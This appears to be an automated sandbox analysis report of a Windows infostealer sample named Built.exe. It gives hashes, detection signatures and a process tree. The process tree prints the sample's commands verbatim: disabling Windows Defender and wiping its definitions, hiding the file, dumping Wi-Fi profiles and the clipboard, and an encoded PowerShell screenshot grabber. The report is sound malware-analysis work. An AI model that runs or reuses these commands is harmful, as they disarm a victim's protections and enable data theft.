Analysis
-
max time kernel
12s -
max time network
21s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-01-2025 19:10
Behavioral task
behavioral1
Sample
Built.exe
Resource
win11-20241007-en
General
-
Target
Built.exe
-
Size
6.0MB
-
MD5
cf6fc2aea60b6d65dcc9c16166c8161a
-
SHA1
49ee49aab7c17b2a518c521a6c46a973e2d95789
-
SHA256
90ef4db2ed060ca10c77de5cac4c09ef26c5470bba68a943547bc4fb35256070
-
SHA512
4157a93fefbfcb4ede0f34427d3c3cd901d829d9412c9efd007cc1761af2b3b5f5bd502746944603cb1740f4f49a2c583ca4560f06a6b428c13b2eba0648ec87
-
SSDEEP
98304:6rIu4+Dcd/amaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HBMG23kMWcZ:60p+DmieNoInY7/sHfbRy9uGOWsX9Tb
Malware Config
Signatures
-
Browser stealer detected. 1 IoCs
Likely to steal browser information like cookies, passwords or sessions.
resource yara_rule behavioral1/memory/4460-277-0x000002DB13DD0000-0x000002DB14145000-memory.dmp BrowserStealer -
pid Process 4428 powershell.exe 1060 powershell.exe 4532 powershell.exe 4660 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2852 cmd.exe 2988 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4660 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe 4460 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 5 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 2224 tasklist.exe 2016 tasklist.exe 1792 tasklist.exe 5028 tasklist.exe 952 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3708 cmd.exe -
resource yara_rule behavioral1/files/0x001900000002aab2-21.dat upx behavioral1/memory/4460-25-0x00007FF9898A0000-0x00007FF989D0E000-memory.dmp upx behavioral1/files/0x001900000002aaa5-27.dat upx behavioral1/memory/4460-29-0x00007FF98CDB0000-0x00007FF98CDD4000-memory.dmp upx behavioral1/files/0x001900000002aab0-30.dat upx behavioral1/memory/4460-32-0x00007FF9932D0000-0x00007FF9932DF000-memory.dmp upx behavioral1/files/0x001900000002aaaf-34.dat upx behavioral1/files/0x001900000002aaac-48.dat upx behavioral1/files/0x001900000002aaab-47.dat upx behavioral1/files/0x001900000002aaaa-46.dat upx behavioral1/files/0x001900000002aaa9-45.dat upx behavioral1/files/0x001900000002aaa8-44.dat upx behavioral1/files/0x001900000002aaa7-43.dat upx behavioral1/files/0x001900000002aaa6-42.dat upx behavioral1/files/0x001b00000002aaa4-41.dat upx behavioral1/files/0x001900000002aab7-40.dat upx behavioral1/files/0x001900000002aab6-39.dat upx behavioral1/files/0x001900000002aab5-38.dat upx behavioral1/files/0x001100000002aab1-35.dat upx behavioral1/memory/4460-54-0x00007FF98CB70000-0x00007FF98CB9D000-memory.dmp upx behavioral1/memory/4460-56-0x00007FF98E500000-0x00007FF98E519000-memory.dmp upx behavioral1/memory/4460-58-0x00007FF98E440000-0x00007FF98E45F000-memory.dmp upx behavioral1/memory/4460-60-0x00007FF989730000-0x00007FF989899000-memory.dmp upx behavioral1/memory/4460-64-0x00007FF98CB40000-0x00007FF98CB4D000-memory.dmp upx behavioral1/memory/4460-63-0x00007FF98CB50000-0x00007FF98CB69000-memory.dmp upx behavioral1/memory/4460-66-0x00007FF98CB10000-0x00007FF98CB3E000-memory.dmp upx behavioral1/memory/4460-68-0x00007FF9898A0000-0x00007FF989D0E000-memory.dmp upx behavioral1/memory/4460-71-0x00007FF989F50000-0x00007FF98A008000-memory.dmp upx behavioral1/memory/4460-74-0x00007FF9893B0000-0x00007FF989725000-memory.dmp upx behavioral1/memory/4460-73-0x00007FF98CDB0000-0x00007FF98CDD4000-memory.dmp upx behavioral1/memory/4460-77-0x00007FF98CAF0000-0x00007FF98CB04000-memory.dmp upx behavioral1/memory/4460-76-0x00007FF9932D0000-0x00007FF9932DF000-memory.dmp upx behavioral1/memory/4460-80-0x00007FF98CAE0000-0x00007FF98CAED000-memory.dmp upx behavioral1/memory/4460-83-0x00007FF989290000-0x00007FF9893A8000-memory.dmp upx behavioral1/memory/4460-82-0x00007FF98E500000-0x00007FF98E519000-memory.dmp upx behavioral1/memory/4460-79-0x00007FF98CB70000-0x00007FF98CB9D000-memory.dmp upx behavioral1/memory/4460-107-0x00007FF98E440000-0x00007FF98E45F000-memory.dmp upx behavioral1/memory/4460-179-0x00007FF98CB50000-0x00007FF98CB69000-memory.dmp upx behavioral1/memory/4460-178-0x00007FF989730000-0x00007FF989899000-memory.dmp upx behavioral1/memory/4460-264-0x00007FF989F50000-0x00007FF98A008000-memory.dmp upx behavioral1/memory/4460-263-0x00007FF98CB10000-0x00007FF98CB3E000-memory.dmp upx behavioral1/memory/4460-279-0x00007FF9893B0000-0x00007FF989725000-memory.dmp upx behavioral1/memory/4460-304-0x00007FF989730000-0x00007FF989899000-memory.dmp upx behavioral1/memory/4460-303-0x00007FF98E440000-0x00007FF98E45F000-memory.dmp upx behavioral1/memory/4460-299-0x00007FF98CDB0000-0x00007FF98CDD4000-memory.dmp upx behavioral1/memory/4460-298-0x00007FF9898A0000-0x00007FF989D0E000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3216 cmd.exe 4556 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4200 WMIC.exe 3788 WMIC.exe 536 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4396 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4660 powershell.exe 4532 powershell.exe 4532 powershell.exe 4660 powershell.exe 2988 powershell.exe 2988 powershell.exe 4968 powershell.exe 4968 powershell.exe 2988 powershell.exe 4968 powershell.exe 4428 powershell.exe 4428 powershell.exe 3172 powershell.exe 3172 powershell.exe 1060 powershell.exe 1060 powershell.exe 3080 powershell.exe 3080 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2224 tasklist.exe Token: SeIncreaseQuotaPrivilege 4656 WMIC.exe Token: SeSecurityPrivilege 4656 WMIC.exe Token: SeTakeOwnershipPrivilege 4656 WMIC.exe Token: SeLoadDriverPrivilege 4656 WMIC.exe Token: SeSystemProfilePrivilege 4656 WMIC.exe Token: SeSystemtimePrivilege 4656 WMIC.exe Token: SeProfSingleProcessPrivilege 4656 WMIC.exe Token: SeIncBasePriorityPrivilege 4656 WMIC.exe Token: SeCreatePagefilePrivilege 4656 WMIC.exe Token: SeBackupPrivilege 4656 WMIC.exe Token: SeRestorePrivilege 4656 WMIC.exe Token: SeShutdownPrivilege 4656 WMIC.exe Token: SeDebugPrivilege 4656 WMIC.exe Token: SeSystemEnvironmentPrivilege 4656 WMIC.exe Token: SeRemoteShutdownPrivilege 4656 WMIC.exe Token: SeUndockPrivilege 4656 WMIC.exe Token: SeManageVolumePrivilege 4656 WMIC.exe Token: 33 4656 WMIC.exe Token: 34 4656 WMIC.exe Token: 35 4656 WMIC.exe Token: 36 4656 WMIC.exe Token: SeIncreaseQuotaPrivilege 4656 WMIC.exe Token: SeSecurityPrivilege 4656 WMIC.exe Token: SeTakeOwnershipPrivilege 4656 WMIC.exe Token: SeLoadDriverPrivilege 4656 WMIC.exe Token: SeSystemProfilePrivilege 4656 WMIC.exe Token: SeSystemtimePrivilege 4656 WMIC.exe Token: SeProfSingleProcessPrivilege 4656 WMIC.exe Token: SeIncBasePriorityPrivilege 4656 WMIC.exe Token: SeCreatePagefilePrivilege 4656 WMIC.exe Token: SeBackupPrivilege 4656 WMIC.exe Token: SeRestorePrivilege 4656 WMIC.exe Token: SeShutdownPrivilege 4656 WMIC.exe Token: SeDebugPrivilege 4656 WMIC.exe Token: SeSystemEnvironmentPrivilege 4656 WMIC.exe Token: SeRemoteShutdownPrivilege 4656 WMIC.exe Token: SeUndockPrivilege 4656 WMIC.exe Token: SeManageVolumePrivilege 4656 WMIC.exe Token: 33 4656 WMIC.exe Token: 34 4656 WMIC.exe Token: 35 4656 WMIC.exe Token: 36 4656 WMIC.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeIncreaseQuotaPrivilege 4200 WMIC.exe Token: SeSecurityPrivilege 4200 WMIC.exe Token: SeTakeOwnershipPrivilege 4200 WMIC.exe Token: SeLoadDriverPrivilege 4200 WMIC.exe Token: SeSystemProfilePrivilege 4200 WMIC.exe Token: SeSystemtimePrivilege 4200 WMIC.exe Token: SeProfSingleProcessPrivilege 4200 WMIC.exe Token: SeIncBasePriorityPrivilege 4200 WMIC.exe Token: SeCreatePagefilePrivilege 4200 WMIC.exe Token: SeBackupPrivilege 4200 WMIC.exe Token: SeRestorePrivilege 4200 WMIC.exe Token: SeShutdownPrivilege 4200 WMIC.exe Token: SeDebugPrivilege 4200 WMIC.exe Token: SeSystemEnvironmentPrivilege 4200 WMIC.exe Token: SeRemoteShutdownPrivilege 4200 WMIC.exe Token: SeUndockPrivilege 4200 WMIC.exe Token: SeManageVolumePrivilege 4200 WMIC.exe Token: 33 4200 WMIC.exe Token: 34 4200 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 4460 1080 Built.exe 77 PID 1080 wrote to memory of 4460 1080 Built.exe 77 PID 4460 wrote to memory of 4328 4460 Built.exe 78 PID 4460 wrote to memory of 4328 4460 Built.exe 78 PID 4460 wrote to memory of 3340 4460 Built.exe 79 PID 4460 wrote to memory of 3340 4460 Built.exe 79 PID 4460 wrote to memory of 4192 4460 Built.exe 82 PID 4460 wrote to memory of 4192 4460 Built.exe 82 PID 4460 wrote to memory of 3508 4460 Built.exe 84 PID 4460 wrote to memory of 3508 4460 Built.exe 84 PID 4192 wrote to memory of 2224 4192 cmd.exe 86 PID 4192 wrote to memory of 2224 4192 cmd.exe 86 PID 3508 wrote to memory of 4656 3508 cmd.exe 87 PID 3508 wrote to memory of 4656 3508 cmd.exe 87 PID 4328 wrote to memory of 4660 4328 cmd.exe 88 PID 4328 wrote to memory of 4660 4328 cmd.exe 88 PID 3340 wrote to memory of 4532 3340 cmd.exe 89 PID 3340 wrote to memory of 4532 3340 cmd.exe 89 PID 4460 wrote to memory of 2348 4460 Built.exe 91 PID 4460 wrote to memory of 2348 4460 Built.exe 91 PID 2348 wrote to memory of 1252 2348 cmd.exe 93 PID 2348 wrote to memory of 1252 2348 cmd.exe 93 PID 4460 wrote to memory of 3060 4460 Built.exe 94 PID 4460 wrote to memory of 3060 4460 Built.exe 94 PID 3060 wrote to memory of 2104 3060 cmd.exe 96 PID 3060 wrote to memory of 2104 3060 cmd.exe 96 PID 4460 wrote to memory of 3028 4460 Built.exe 97 PID 4460 wrote to memory of 3028 4460 Built.exe 97 PID 3028 wrote to memory of 4200 3028 cmd.exe 99 PID 3028 wrote to memory of 4200 3028 cmd.exe 99 PID 4460 wrote to memory of 1856 4460 Built.exe 100 PID 4460 wrote to memory of 1856 4460 Built.exe 100 PID 1856 wrote to memory of 3788 1856 cmd.exe 102 PID 1856 wrote to memory of 3788 1856 cmd.exe 102 PID 4460 wrote to memory of 3708 4460 Built.exe 103 PID 4460 wrote to memory of 3708 4460 Built.exe 103 PID 3708 wrote to memory of 760 3708 cmd.exe 159 PID 3708 wrote to memory of 760 3708 cmd.exe 159 PID 4460 wrote to memory of 2772 4460 Built.exe 106 PID 4460 wrote to memory of 2772 4460 Built.exe 106 PID 4460 wrote to memory of 4388 4460 Built.exe 108 PID 4460 wrote to memory of 4388 4460 Built.exe 108 PID 4460 wrote to memory of 2724 4460 Built.exe 110 PID 4460 wrote to memory of 2724 4460 Built.exe 110 PID 4460 wrote to memory of 2852 4460 Built.exe 111 PID 4460 wrote to memory of 2852 4460 Built.exe 111 PID 4460 wrote to memory of 4932 4460 Built.exe 113 PID 4460 wrote to memory of 4932 4460 Built.exe 113 PID 4460 wrote to memory of 3992 4460 Built.exe 116 PID 4460 wrote to memory of 3992 4460 Built.exe 116 PID 4460 wrote to memory of 3216 4460 Built.exe 117 PID 4460 wrote to memory of 3216 4460 Built.exe 117 PID 4388 wrote to memory of 2016 4388 cmd.exe 118 PID 4388 wrote to memory of 2016 4388 cmd.exe 118 PID 2772 wrote to memory of 1792 2772 cmd.exe 120 PID 2772 wrote to memory of 1792 2772 cmd.exe 120 PID 4460 wrote to memory of 1652 4460 Built.exe 121 PID 4460 wrote to memory of 1652 4460 Built.exe 121 PID 4460 wrote to memory of 1236 4460 Built.exe 124 PID 4460 wrote to memory of 1236 4460 Built.exe 124 PID 4460 wrote to memory of 384 4460 Built.exe 126 PID 4460 wrote to memory of 384 4460 Built.exe 126 PID 2724 wrote to memory of 2604 2724 cmd.exe 128 PID 2724 wrote to memory of 2604 2724 cmd.exe 128 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 760 attrib.exe 2928 attrib.exe 4800 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:1252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:2104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Views/modifies file attributes
PID:760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4932
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3992
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3216 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1652
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1236
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:384
-
